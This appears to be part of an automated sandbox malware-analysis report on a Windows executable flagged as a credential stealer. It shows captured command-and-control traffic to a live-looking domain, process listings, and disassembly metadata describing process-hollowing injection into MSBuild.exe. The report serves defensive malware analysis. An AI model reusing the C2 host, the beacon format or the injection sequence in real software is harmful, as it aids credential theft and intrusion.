44 a4 c2 26 d5 88 33 22 Data Ascii: .[m=TFpZD7v{y5]x)&S=q{\\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*Z`wPD&3"
2024-12-27 14:35:58 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nd4ejr6d4o9ddnq6vbq7na3980; expires=Tue, 22 Apr 2025 08:22:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4UETYt2Ir%2FtS%2BEGpcMY5f1L%2BHsqMQFSDBgsVugGejiqY0vfPNcgX%2BTvxFk8%2BuzCWovC%2B5eeoYyAUokNOCeZxnQsNc2hgaOZ7LpMnv8MK0EeCpZtLrpxLmdZWKYd1mYbFNSc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a0a3c5c8b42bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1602&rtt_var=697&sent=338&recv=594&lost=0&retrans=0&sent_bytes=2840&recv_bytes=573102&delivery_rate=1822721&cwnd=196&unsent_bytes=0&cid=20d1d2551f84d3f6&ts=2440&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49814	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:59 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: prisonyfork.buzz
2024-12-27 14:35:59 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 26 6a 3d 26 68 77 69 64 3d 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6299960613&j=&hwid=99679C16956EFB728B85154C9421A187
2024-12-27 14:36:00 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nqbi55gt6hbp8rlei7139t0nn5; expires=Tue, 22 Apr 2025 08:22:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZccmltZK5dypjboT78%2BVg2QbW7qcsLqqDLdQwSGrN%2B9yHeVkc76%2Bea7bSVJZ%2FBwLgZQbwRgeT5jZAb3crbU4VhKt62kXbDeUAYRiUcC6YzV6bW6cpg3oPNwDN1cQies1NhJ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a0a54cc6d42fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1732&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=987&delivery_rate=1610590&cwnd=187&unsent_bytes=0&cid=15630cd9ff7b9a34&ts=795&x=0"
2024-12-27 14:36:00 UTC	246	IN	Data Raw: 62 66 32 0d 0a 37 41 58 79 58 71 4a 30 58 6c 59 72 74 34 6e 35 5a 39 55 71 69 54 4e 65 30 6e 36 78 54 79 34 50 4b 33 45 64 30 64 72 33 7a 58 36 33 66 74 41 34 31 6c 5a 6b 5a 77 65 56 37 4e 74 64 35 41 61 72 56 33 7a 6f 58 4d 6b 42 47 7a 35 4d 47 55 32 42 72 70 75 35 52 6f 5a 68 76 44 58 72 45 44 41 33 55 65 62 43 6b 46 2b 48 48 37 6c 69 42 49 5a 48 38 42 6b 5a 61 6c 4d 61 53 61 4f 2f 68 34 59 30 68 45 54 41 48 65 63 48 64 57 52 38 68 4f 43 33 56 2b 64 37 34 51 45 36 6f 44 44 77 50 6d 4a 33 59 78 39 50 6b 37 61 6e 2f 44 79 30 63 63 55 5a 38 44 73 71 59 45 44 45 33 5a 77 44 6a 47 50 64 53 57 6d 49 48 4e 63 47 48 56 74 78 4d 6c 57 4c 36 49 54 39 50 59 4e 7a 74 7a 76 47 4d 52 6b 44 64 35 6a 59 76 77 4c 6d 57 64 41 4c 61 4f 45 50 34 Data Ascii: bf27AXyXqJ0XlYrt4n5Z9UqiTNe0n6xTy4PK3Ed0dr3zX63ftA41lZkZweV7Ntd5AarV3zoXMkBGz5MGU2Brpu5RoZhvDXrEDA3UebCkF+HH7liBIZH8BkZalMaSaO/h4Y0hETAHecHdWR8hOC3V+d74QE6oDDwPmJ3Yx9Pk7an/Dy0ccUZ8DsqYEDE3ZwDjGPdSWmIHNcGHVtxMlWL6IT9PYNztzvGMRkDd5jYvwLmWdALaOEP4
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 6a 5a 64 52 33 73 62 58 35 2f 74 67 66 67 6b 69 45 75 57 46 38 31 44 44 6a 39 6b 78 39 36 50 4e 65 56 39 76 58 51 53 70 44 48 68 46 6d 70 66 41 41 46 4f 68 70 79 78 6e 55 79 62 57 64 30 32 78 42 6f 54 59 52 6a 7a 78 36 38 64 76 6c 7a 63 59 54 4b 2b 45 64 38 37 54 44 63 5a 4a 33 6a 67 71 70 75 68 4c 74 31 58 74 57 65 56 4d 78 30 5a 57 35 7a 69 6a 79 54 6e 59 75 78 6d 43 71 68 4a 36 79 31 49 52 68 67 6c 52 35 79 53 72 66 38 78 6d 30 2b 64 41 6f 31 4d 4f 7a 4a 74 38 4e 79 6c 53 49 52 73 33 41 41 74 69 44 75 48 66 46 39 63 55 7a 77 6f 34 4c 32 66 6e 52 69 59 61 59 5a 6d 79 42 41 51 50 57 4c 54 35 35 68 55 68 47 48 77 43 77 7a 6e 54 75 42 36 65 6a 5a 70 51 43 71 30 6f 70 79 5a 44 49 6c 31 76 68 32 52 47 67 6b 56 62 6f 2b 69 79 7a 44 6d 55 4f 30 44 62 49 4d 57 Data Ascii: jZdR3sbX5/tgfgkiEuWF81DDj9kx96PNeV9vXQSpDHhFmpfAAFOhpyxnUybWd02xBoTYRjzx68dvlzcYTK+Ed87TDcZJ3jgqpuhLt1XtWeVMx0ZW5zijyTnYuxmCqhJ6y1IRhglR5ySrf8xm0+dAo1MOzJt8NylSIRs3AAtiDuHfF9cUzwo4L2fnRiYaYZmyBAQPWLT55hUhGHwCwznTuB6ejZpQCq0opyZDIl1vh2RGgkVbo+iyzDmUO0DbIMW
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 6f 59 41 6b 65 55 37 4d 53 38 4c 5a 52 4c 78 32 2f 46 48 41 34 47 58 39 76 39 77 51 32 78 5a 4f 4a 36 4f 72 77 66 79 78 35 6c 5a 68 4d 6a 4b 4f 47 4c 72 5a 6c 48 72 56 50 46 4f 39 6f 66 43 69 52 4f 78 38 57 38 56 4c 74 39 79 6e 5a 6d 2b 55 7a 6d 66 46 64 42 47 30 4e 4d 75 65 69 54 76 7a 43 74 64 4c 34 6d 36 68 6f 4d 46 45 66 6e 75 62 73 2f 6f 52 33 4f 59 52 47 6d 53 4e 6f 38 65 6d 70 50 4b 46 53 46 6f 4d 43 58 48 49 70 4d 77 51 72 34 4e 78 59 4d 47 63 53 35 75 67 69 6a 62 2b 78 58 47 35 55 72 37 57 42 2f 53 55 35 43 62 6f 75 66 77 66 34 50 76 33 32 38 61 35 4d 54 4e 67 5a 37 77 2b 57 4e 58 37 39 4f 78 31 67 58 74 68 44 51 4e 58 39 45 51 6b 6c 50 35 4f 71 6d 6c 79 72 56 52 4b 52 70 78 77 77 31 41 6c 6e 53 2b 62 55 69 35 6b 54 65 63 42 76 71 56 59 4d 59 48 Data Ascii: oYAkeU7MS8LZRLx2/FHA4GX9v9wQ2xZOJ6Orwfyx5lZhMjKOGLrZlHrVPFO9ofCiROx8W8VLt9ynZm+UzmfFdBG0NMueiTvzCtdL4m6hoMFEfnubs/oR3OYRGmSNo8empPKFSFoMCXHIpMwQr4NxYMGcS5ugijb+xXG5Ur7WB/SU5Cboufwf4Pv328a5MTNgZ7w+WNX79Ox1gXthDQNX9EQklP5OqmlyrVRKRpxww1AlnS+bUi5kTecBvqVYMYH
2024-12-27 14:36:00 UTC	81	IN	Data Raw: 72 6a 66 58 42 72 42 43 35 51 71 63 43 6a 53 30 56 50 45 44 56 78 72 45 2b 70 32 79 2b 58 79 65 56 4e 64 63 63 52 7a 68 41 48 55 48 2b 36 63 57 72 47 70 39 54 72 6e 48 45 49 6a 73 39 55 39 54 76 76 30 79 2b 55 38 78 58 64 66 6b 6f 35 52 0d 0a Data Ascii: rjfXBrBC5QqcCjS0VPEDVxrE+p2y+XyeVNdccRzhAHUH+6cWrGp9TrnHEIjs9U9Tvv0y+U8xXdfko5R
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 32 61 61 61 0d 0a 31 38 52 32 59 6b 64 59 62 72 76 61 4e 47 67 30 6d 46 47 39 6f 37 44 77 35 6d 35 36 4b 4a 45 62 42 67 35 56 67 54 76 43 33 43 4a 6b 42 57 47 68 4e 77 34 75 4b 57 6f 69 32 70 4d 4b 46 76 32 67 4d 57 59 6e 37 34 31 64 59 68 6b 6e 76 48 42 43 61 48 49 70 34 67 54 58 78 47 53 43 69 45 74 38 53 47 4d 6f 39 64 76 6a 50 41 48 32 6f 42 61 74 47 69 6b 53 36 41 66 63 39 58 44 70 77 38 34 7a 5a 4b 65 55 45 72 57 4c 6d 4a 76 4a 34 36 6f 6d 7a 41 50 4a 45 64 42 41 51 66 39 73 4b 71 58 34 51 65 32 6e 6b 43 2f 54 4c 6c 43 30 56 4a 53 67 6c 32 68 61 69 53 76 54 57 46 58 61 4d 7a 78 44 45 39 62 68 7a 32 77 63 35 54 6e 31 2f 76 55 6a 53 7a 53 65 55 43 48 45 52 7a 48 30 79 35 6b 6f 43 64 54 4b 46 4e 68 69 66 59 42 77 6b 4d 47 64 33 44 71 41 2b 55 53 39 42 Data Ascii: 2aaa18R2YkdYbrvaNGg0mFG9o7Dw5m56KJEbBg5VgTvC3CJkBWGhNw4uKWoi2pMKFv2gMWYn741dYhknvHBCaHIp4gTXxGSCiEt8SGMo9dvjPAH2oBatGikS6Afc9XDpw84zZKeUErWLmJvJ46omzAPJEdBAQf9sKqX4Qe2nkC/TLlC0VJSgl2haiSvTWFXaMzxDE9bhz2wc5Tn1/vUjSzSeUCHERzH0y5koCdTKFNhifYBwkMGd3DqA+US9B
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 50 38 42 52 57 42 44 42 30 53 41 6e 5a 69 70 47 36 4a 72 77 54 54 51 4a 7a 77 78 57 75 66 4d 67 44 61 32 66 71 4a 6c 44 70 55 72 79 77 49 58 59 6b 45 65 4c 4c 32 32 6a 62 38 72 70 6e 4c 46 62 39 49 66 4e 41 78 68 78 4f 79 53 48 62 46 75 35 41 51 30 69 43 76 72 50 48 6c 54 42 44 34 73 73 4c 47 44 6d 53 79 68 51 4a 30 39 78 7a 30 39 62 77 44 76 2f 4a 52 58 6e 6e 76 4b 41 67 75 2b 4b 63 41 35 61 32 6f 41 49 46 47 2b 76 72 4b 62 53 4e 31 72 69 78 33 6b 50 51 67 69 54 64 4c 74 79 41 43 39 5a 50 35 6e 4c 34 45 36 30 69 49 63 58 42 67 59 52 4c 32 51 6e 35 46 52 71 57 6e 42 4f 66 45 2b 41 6e 6c 6e 34 38 32 53 49 62 52 53 34 6d 63 73 74 77 37 37 42 32 59 37 57 44 4d 73 6c 5a 66 47 6f 79 65 74 53 72 63 4a 2b 43 49 76 62 33 32 42 32 34 38 67 6d 30 48 78 53 67 79 55 Data Ascii: P8BRWBDB0SAnZipG6JrwTTQJzwxWufMgDa2fqJlDpUrywIXYkEeLL22jb8rpnLFb9IfNAxhxOySHbFu5AQ0iCvrPHlTBD4ssLGDmSyhQJ09xz09bwDv/JRXnnvKAgu+KcA5a2oAIFG+vrKbSN1rix3kPQgiTdLtyAC9ZP5nL4E60iIcXBgYRL2Qn5FRqWnBOfE+Anln482SIbRS4mcstw77B2Y7WDMslZfGoyetSrcJ+CIvb32B248gm0HxSgyU
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 77 38 57 69 4a 79 76 65 71 39 76 43 79 6b 56 62 30 6b 2b 46 39 31 46 55 6e 5a 75 72 42 56 6f 42 2f 4e 66 54 65 2b 54 64 59 63 5a 46 4d 45 50 55 6d 56 73 62 47 73 42 6f 64 52 67 44 76 53 50 7a 63 4f 65 74 72 4d 71 31 2f 74 48 63 34 41 61 65 59 30 78 43 52 61 4e 68 38 41 66 49 54 71 68 2f 6f 35 33 31 65 77 47 4e 67 66 45 42 55 66 68 64 69 4c 4c 34 5a 70 36 32 63 71 74 67 33 6f 65 58 6c 4c 48 42 39 70 73 70 47 62 76 53 53 2f 54 61 68 73 30 54 34 5a 4e 52 6a 51 77 71 77 69 34 6e 6a 4c 61 6a 65 2f 4d 49 59 4d 47 45 6c 69 4a 45 2b 54 69 62 50 31 4c 5a 70 30 6d 41 33 70 4a 78 6f 55 52 49 37 49 75 7a 47 55 59 75 31 35 4a 35 4e 47 34 48 74 39 55 77 51 74 4d 72 76 6a 6e 6f 51 73 74 45 4b 6e 4b 4a 49 37 4c 68 70 6e 31 74 47 66 44 4c 6c 4e 6f 67 5a 74 35 45 6a 38 66 Data Ascii: w8WiJyveq9vCykVb0k+F91FUnZurBVoB/NfTe+TdYcZFMEPUmVsbGsBodRgDvSPzcOetrMq1/tHc4AaeY0xCRaNh8AfITqh/o531ewGNgfEBUfhdiLL4Zp62cqtg3oeXlLHB9pspGbvSS/Tahs0T4ZNRjQwqwi4njLaje/MIYMGEliJE+TibP1LZp0mA3pJxoURI7IuzGUYu15J5NG4Ht9UwQtMrvjnoQstEKnKJI7Lhpn1tGfDLlNogZt5Ej8f
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 45 66 34 4b 78 7a 71 34 6d 76 55 65 31 4e 4d 52 4e 50 43 56 2f 39 4f 71 51 44 35 6c 36 2f 56 6c 76 71 42 58 64 4b 30 56 47 54 78 39 38 71 34 4f 72 34 67 32 59 58 37 38 76 38 77 31 70 4e 57 72 68 76 70 77 72 67 42 6e 69 61 51 53 59 4e 76 6b 58 53 45 5a 78 52 55 72 6b 37 62 4b 75 50 35 70 4f 68 68 62 31 48 54 67 54 53 50 4c 78 77 51 53 32 57 65 64 31 4b 5a 4d 63 2f 53 78 61 53 56 35 48 56 4a 36 70 6e 4b 34 57 6f 33 4f 55 46 2b 67 2f 5a 6d 39 49 67 73 4f 68 50 5a 5a 69 30 77 45 74 34 44 7a 70 46 52 39 2b 54 55 6c 58 68 59 4f 61 71 78 71 6c 59 59 56 73 36 53 59 70 46 58 6e 4f 32 34 41 4e 6a 33 37 6e 59 44 2b 42 4f 75 73 37 66 48 31 37 41 53 36 77 6f 4b 36 35 44 6f 6c 76 76 47 72 42 4c 67 6f 69 5a 50 33 67 6c 6c 43 2b 58 75 70 6a 47 61 6f 30 33 54 35 37 54 52 Data Ascii: Ef4Kxzq4mvUe1NMRNPCV/9OqQD5l6/VlvqBXdK0VGTx98q4Or4g2YX78v8w1pNWrhvpwrgBniaQSYNvkXSEZxRUrk7bKuP5pOhhb1HTgTSPLxwQS2Wed1KZMc/SxaSV5HVJ6pnK4Wo3OUF+g/Zm9IgsOhPZZi0wEt4DzpFR9+TUlXhYOaqxqlYYVs6SYpFXnO24ANj37nYD+BOus7fH17AS6woK65DolvvGrBLgoiZP3gllC+XupjGao03T57TR
2024-12-27 14:36:00 UTC	1369	IN	Data Raw: 38 62 4b 41 53 64 39 31 6b 77 76 6b 52 41 51 68 65 74 7a 62 6f 54 50 73 61 37 78 6a 4e 75 73 47 2f 33 6f 66 66 68 49 6e 55 49 4b 66 67 37 63 36 6c 6d 47 5a 46 38 59 61 4c 42 42 45 38 65 76 4e 4d 4b 31 6d 38 48 56 72 34 67 66 46 66 78 64 42 57 45 46 6e 75 34 2b 46 2f 44 69 55 56 5a 6b 36 77 78 6f 50 4d 6e 50 34 32 71 39 56 68 45 4b 37 56 79 79 63 4f 74 4d 45 48 30 6f 66 4a 31 4b 35 75 4a 79 43 44 4e 30 31 75 69 72 73 50 79 64 6a 55 73 48 6e 69 51 6a 6e 63 71 49 45 4f 72 41 59 38 42 35 74 5a 46 34 31 53 2b 43 50 6d 70 73 52 6d 6b 43 58 41 6f 30 74 5a 67 35 73 36 36 62 4b 50 35 6c 41 7a 6c 41 48 6f 6a 47 47 41 58 68 71 65 7a 4a 6b 74 36 69 5a 2b 78 44 66 4c 70 51 36 34 78 73 30 43 67 54 74 32 37 45 47 6b 68 50 73 58 69 69 59 49 70 34 44 65 6b 74 41 4e 33 79 Data Ascii: 8bKASd91kwvkRAQhetzboTPsa7xjNusG/3offhInUIKfg7c6lmGZF8YaLBBE8evNMK1m8HVr4gfFfxdBWEFnu4+F/DiUVZk6wxoPMnP42q9VhEK7VyycOtMEH0ofJ1K5uJyCDN01uirsPydjUsHniQjncqIEOrAY8B5tZF41S+CPmpsRmkCXAo0tZg5s66bKP5lAzlAHojGGAXhqezJkt6iZ+xDfLpQ64xs0CgTt27EGkhPsXiiYIp4DektAN3y

Target ID:	0
Start time:	09:34:54
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\0x001f00000004676d-1858.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Imagebase:	0xb70000
File size:	571'432 bytes
MD5 hash:	AB4263D8BD7675F83C88DB675D103F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:34:54
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:34:54
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\0x001f00000004676d-1858.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Imagebase:	0xb70000
File size:	571'432 bytes
MD5 hash:	AB4263D8BD7675F83C88DB675D103F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:34:55
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\0x001f00000004676d-1858.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Imagebase:	0xb70000
File size:	571'432 bytes
MD5 hash:	AB4263D8BD7675F83C88DB675D103F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:34:55
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\0x001f00000004676d-1858.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Imagebase:	0xb70000
File size:	571'432 bytes
MD5 hash:	AB4263D8BD7675F83C88DB675D103F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2587726023.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2615711054.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.8%
Total number of Nodes:	815
Total number of Limit Nodes:	22

Executed Functions

Function 00BAA19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00BAA110,00BAA100), ref: 00BAA334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00BAA347
Wow64GetThreadContext.KERNEL32(0000012C,00000000), ref: 00BAA365
ReadProcessMemory.KERNELBASE(0000011C,?,00BAA154,00000004,00000000), ref: 00BAA389
VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 00BAA3B4
TerminateProcess.KERNELBASE(0000011C,00000000), ref: 00BAA3D3
WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 00BAA40C
WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 00BAA457
WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 00BAA495
Wow64SetThreadContext.KERNEL32(0000012C,00B50000), ref: 00BAA4D1
ResumeThread.KERNELBASE(0000012C), ref: 00BAA4E0

Strings

ress, xrefs: 00BAA226
ReadProcessMemory, xrefs: 00BAA289
SetThreadContext, xrefs: 00BAA2C2
Load, xrefs: 00BAA1DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00BAA333
VirtualAlloc, xrefs: 00BAA263
CreateProcessW, xrefs: 00BAA250
aryA, xrefs: 00BAA1E2
TerminateProcess, xrefs: 00BAA3C3
GetP, xrefs: 00BAA21E
ResumeThread, xrefs: 00BAA2D8
GetThreadContext, xrefs: 00BAA276
WriteProcessMemory, xrefs: 00BAA2AF
VirtualAllocEx, xrefs: 00BAA29C

Memory Dump Source

Source File: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: fcf71757a4651ff53432ea67cbbaa94dc6ae86c019f32948e28c6d9dd01400de
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 17B1087260424AAFDB60CF68CC80BDA77E5FF89714F158164EA08AB341D774FA51CBA4

Function 00B71FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B71240: _strlen.LIBCMT ref: 00B712BA

CreateFileA.KERNELBASE ref: 00B72036
GetFileSize.KERNEL32(00000000,00000000), ref: 00B72046
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00B7206B
CloseHandle.KERNELBASE(00000000), ref: 00B7207A
_strlen.LIBCMT ref: 00B720CD
CloseHandle.KERNEL32(00000000), ref: 00B721FD

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: 3cb236aa3b78a6db0a9ce3ba758fb75bc07332438fd7751e6531280ea935616a
Instruction ID: a2fe955e492f3475b85d5bc657e470af6e5f165761a29fa69071215bc937a9a0
Opcode Fuzzy Hash: 3cb236aa3b78a6db0a9ce3ba758fb75bc07332438fd7751e6531280ea935616a
Instruction Fuzzy Hash: 8571D6B2C002149BCB10DF68DC45BAEBBF5FF49320F184669E829B7391E7319945CBA1

Function 00B71000 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c909e77374a6a08611aec6e4f7efc62c4bd5a3e05530f70eb573cdc980998801
Instruction ID: bf39805abc8cdd88865abbc5c0d28c252554679d8a3bf028497b9d423c271aa2
Opcode Fuzzy Hash: c909e77374a6a08611aec6e4f7efc62c4bd5a3e05530f70eb573cdc980998801
Instruction Fuzzy Hash: 10212B326141650B875C9F3C6D62037FBDADB865A0B059A6ADD269F2D1E520DD1082F4

Function 00B724B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00B724DD
ShowWindow.USER32(00000000,00000000), ref: 00B724E6
GetCurrentThreadId.KERNEL32 ref: 00B72524

Part of subcall function 00B7F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00B7253A,?,?,00000000), ref: 00B7F129
Part of subcall function 00B7F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00B7253A,?,?,00000000), ref: 00B7F142
Part of subcall function 00B7F11D: CloseHandle.KERNEL32(?,?,?,00B7253A,?,?,00000000), ref: 00B7F154

std::_Throw_Cpp_error.LIBCPMT ref: 00B72567
std::_Throw_Cpp_error.LIBCPMT ref: 00B72578
std::_Throw_Cpp_error.LIBCPMT ref: 00B72589
std::_Throw_Cpp_error.LIBCPMT ref: 00B7259A

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

